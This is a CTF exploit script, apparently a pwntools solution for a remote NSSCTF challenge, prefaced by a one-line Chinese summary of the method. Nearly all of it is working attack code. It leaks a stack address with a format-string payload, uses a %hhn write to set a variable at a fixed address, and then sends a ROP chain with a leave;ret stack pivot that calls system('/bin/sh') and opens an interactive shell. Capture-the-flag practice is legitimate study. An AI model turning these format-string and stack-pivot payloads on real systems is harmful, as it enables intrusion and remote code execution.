通过格式化字符串泄露栈地址,并将k改为102,最后进行栈迁移即可
from struct import *
from ctypes import *
def dbg():
    """Attach a debugger to the module-level ``io`` tube and pause the script.

    Breaks at the hard-coded address below; ``gdb`` and ``pause`` are
    presumably pwntools names, which are not imported on this page.
    """
    breakpoint_cmd = 'b *0x40073e'
    gdb.attach(io, breakpoint_cmd)
    pause()
def s(a) -> None:
    """Send ``a`` on the module-level ``io`` tube (pwntools ``send``, no newline appended)."""
    io.send(a)
def sl(a) -> None:
    """Send ``a`` followed by a newline on the module-level ``io`` tube."""
    io.sendline(a)
def sa(a, b) -> None:
    """Wait until ``a`` is received on ``io``, then send ``b`` (no newline)."""
    io.sendafter(a, b)
def sla(a, b) -> None:
    """Wait until ``a`` is received on ``io``, then send ``b`` plus a newline."""
    io.sendlineafter(a, b)
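def r():
    """Receive whatever is currently available on ``io`` and return it.

    The original discarded the received bytes; returning them is
    backward-compatible (callers that ignored the result still work) and
    keeps this helper consistent with ``get_addr``/``sb``, which return
    their values.
    """
    return io.recv()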
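def rl():
    """Receive one line from ``io`` and return it.

    Returns the line instead of dropping it, so callers can inspect the
    prompt text; existing callers that ignore the result are unaffected.
    """
    return io.recvline()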
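def ru(a):
    """Receive from ``io`` up to and including ``a`` and return the data.

    The original discarded the consumed bytes; returning them is
    backward-compatible and lets a caller check what was skipped.
    """
    return io.recvuntil(a)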
def get_addr():
    """Read from ``io`` up to the next ``0x7f`` byte and unpack the last 6 bytes as a u64.

    The 6-byte tail is zero-padded to 8 bytes before unpacking. ``u64`` is
    presumably the pwntools helper, which is not imported on this page.
    This helper is not called anywhere on this page.
    """
    raw = io.recvuntil(b'\x7f')
    tail = raw[-6:]
    return u64(tail.ljust(8, b'\x00'))
def sb():
    """Return ``(libc_base + system, libc_base + "/bin/sh")`` as a 2-tuple.

    NOTE(review): neither ``libc_base`` nor ``libc`` is defined on this
    page (the ``libc = ELF(...)`` line is commented out), so calling this
    as written raises ``NameError``. It is not called anywhere on this page.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr
# Select the I/O tube. NOTE(review): ``process``/``remote`` (and ``ELF``,
# ``p64`` used below) are not imported on this page; presumably a
# ``from pwn import *`` belongs at the top of the file -- confirm.
debug = 1
if debug == 0:
    io = process('./pwn')
elif debug == 1:
    io = remote('node5.anna.nssctf.cn', 28241)
#context(os = 'linux', arch = 'amd64', log_level = 'debug')
# Target binary handle; only ``elf.plt['system']`` is read from it below.
elf = ELF('./pwn')
#libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc-2.31.so')
# ctypes handle to the host libc. NOTE(review): ``c`` is never used on this page.
c = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
#--------------------------------------------------------------------
# Challenge-specific addresses (all hard-coded; not verifiable from this page).
key = 0x6010A0  # address written by the first payload (via p64(key) and %8$hhn)
rdi = 0x0400893  # gadget placed before the ``shell`` pointer in the second payload (presumably pop rdi; ret)
ret = 0x0400581  # gadget placed right after the "/bin/sh" string (presumably a bare ret)
leave = 0x0400758  # gadget used as the final return address of the second payload (presumably leave; ret)
#dbg()
# First message: the note at the top of the file describes this as a
# format-string leak of a stack address plus a one-byte write that sets k
# to 102. The ``102-14`` count presumably accounts for the characters
# already printed by '%32$p' -- confirm against the binary's output.
payload = b'%32$p' + b'%'+ str(102-14).encode() + b'c%8$hhna' + p64(key)
sl(payload)
# Parse the leaked value: hex text between ',' and the next space.
ru(b',')
stack = int(io.recvuntil(b' ',drop = True),16)
shell = stack - 0x30  # challenge-specific offset from the leaked value to the pivot target
# Second message: "/bin/sh" string, then ret/rdi/shell/system, padded to
# 0x30, then ``shell`` as the new saved frame pointer and ``leave`` as the
# return address -- the stack migration the top-of-file note refers to.
payload = b'/bin/sh\x00' + p64(ret) + p64(rdi) + p64(shell) + p64(elf.plt['system'])
payload = payload.ljust(0x30,b'a') + p64(shell) + p64(leave)
sl(payload)
sla('?', b'dijia')  # answers the prompt; note the str pattern while other calls use bytes
print("stack :"+hex(shell))
io.interactive()
